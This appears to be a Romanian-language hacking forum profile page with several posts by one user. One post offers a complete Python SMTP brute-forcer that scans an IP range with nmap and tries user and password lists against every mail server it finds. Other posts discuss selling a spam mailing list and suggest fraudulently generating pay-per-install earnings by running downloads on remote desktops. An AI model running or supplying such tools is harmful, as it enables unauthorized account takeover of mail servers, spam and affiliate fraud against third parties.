Jump to content

ripoff

Active Members
  • Posts

    1210
  • Joined

  • Last visited

  • Days Won

    4

Posts posted by ripoff

  1. Eu am lucrat la paza carfur acum 3-4 ani.O sa iti vina o citatie sa te duci la sectie, acolo o sa te puna un procuror sa dai o declaratie ce si cum,dupa vreo 3-4 luni o sa iti vina o amenda administrativa de 5-10 mil. si o scrisoare de la parchet ca urmarirea penala sa terminat.In carfur sunt agenti de paza in civil care se plimba prin raioane si urmaresc pe cine li se pare suspect...

    Ps: ati avut noroc ca nu v-au caftit.

  2. Probabil ca se repeta adresele ,totusi 4 milioane e cam mult ar insemna cam toate mailurile romanesti (care nu cred ca sunt mai mult de 6 mil) scazand din populatia tarii batrani si persoane care n-au treaba cu netul.Sa dai spam la toate e o pierdere de timp daca nu sunt impartite pe nise poate doar sa promovezi un serviciu general de ex un site de stiri etc..scuze de offtopic ,spor la vanzare.

  3. dai scan cu namp, apoi smtp-brute NSE Script

    sau

    brute.py

    #!usr/bin/python#Smtp Brute Forcer, searches ip_range for hosts using smtp.



    import threading, time, StringIO, commands, random, sys, smtplib, re, socket
    from smtplib import SMTP
    from copy import copy


    if len(sys.argv) !=4:
    print "Usage: ./smtpbrute_iprange.py <ip_range> <userlist> <wordlist>"
    sys.exit(1)


    try:
    users = open(sys.argv[2], "r").readlines()
    except(IOError):
    print "Error: Check your userlist path\n"
    sys.exit(1)

    try:
    words = open(sys.argv[3], "r").readlines()
    except(IOError):
    print "Error: Check your wordlist path\n"
    sys.exit(1)


    print "\n\t SmtpBruteForcer v1.0"
    print "\t--------------------------------------------------\n"
    print "[+] Scanning:",sys.argv[1]
    print "[+] Users Loaded:",len(users)
    print "[+] Words Loaded:",len(words)


    wordlist = copy(words)


    def scan():


    iprange = sys.argv[1]
    ip_list = []

    nmap = StringIO.StringIO(commands.getstatusoutput('nmap -P0 '+iprange+' -p 25 | grep open -B 3')[1]).readlines()

    for tmp in nmap:
    ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", tmp)
    if ipaddr:
    ip_list.append(ipaddr[0])
    return ip_list


    def reloader():
    for word in wordlist:
    words.append(word)


    def getword():
    lock = threading.Lock()
    lock.acquire()
    if len(words) != 0:
    value = random.sample(words, 1)
    words.remove(value[0])

    else:
    reloader()
    value = random.sample(words, 1)

    lock.release()
    return value[0][:-1]

    class Workhorse(threading.Thread):

    def run(self):
    value = getword()
    try:
    print "-"*12
    print "User:",user[:-1],"Password:",value
    smtp = smtplib.SMTP(ip)
    smtp.login(user[:-1], value)
    print "\t\nLogin successful:",user, value
    smtp.quit()
    work.join()
    sys.exit(2)
    except(socket.gaierror, socket.error, socket.herror, smtplib.SMTPException), msg:
    #print "An error occurred:", msg
    pass


    ip_list = scan()
    print "[+] Hosts Loaded:",len(ip_list),"\n"
    for ip in ip_list:
    print "\n\tAttempting BruteForce:",ip,"\n"
    try:
    helo = smtplib.SMTP(ip)
    print helo.helo(), "\n"
    helo.quit()
    except(socket.gaierror, socket.error, socket.herror, smtplib.SMTPException):
    print "Server doesn't support the Helo cmd"
    for user in users:
    for i in range(len(words)):
    if i == 0: reloader()
    work = Workhorse()
    work.start()
    time.sleep(2)


    passwordlist.txt

    userlist.txt

  4. Once a user clicks on your link and downloads fileze’s download manger your account will be credited as a successful install .You can view the payment rates on the right hand side of this page. We reward users that receive more files downloaded by increasing payouts, we base our revenue structure on different tiers. For example if a user downloads your file and is not from one of these countries your account will not be credited. We offer generous payouts: Fileze has earned a reputation of accurate, substantial and timely (net-30) pay-outs for free users and (net 7) for Premium members! Our minimum pay-out is lower the other networks at only $25.00. We make payments via PayPal only, wire and alert pay is available upon request for premium publishers. Fileze has a referral system in place that rewards our user base with 5% of all earnings that you refer! Please note that Fileze maintains a strict intellectual property policy. By using the service, you represent and warrant that you are the author and copyright owner and/or proper licensee with respect to any content and you further represent and warrant that no content violates the intellectual property rights of any third party .Please read our terms and service policy before you click signup!

    INSTALL RATES


    Monthly Installs Tier 1 Tier 2 Tier 3
    1 to 3,000 $0.85 $0.38 $0.10
    3,001 to 10,000 $1.00 $0.40 $0.11
    10,001 to 20,000 $1.10 $0.49 $0.12
    20,001 to 40,000 $1.21 $0.53 $0.14
    40,001 to 80,000 $1.29 $0.68 $0.15
    80,001 to 160,000 $1.37 $0.71 $0.16
    160,001 to 1,000,000 $1.45 $0.75 $0.17

    [B]Tier Countries[/B]
    1 United States
    2 France ,Germany ,United Kingdom
    3 Australia ,Austria ,Belgium ,Denmark ,Finland ,Ireland ,Italy ,New Zealand ,Norway ,Portugal ,Sweden ,Switzerland ,Netherlands ,Canada

    Cred ca merge sa fac download la program de pe rdp-uri,ne-am scos :D

×
×
  • Create New...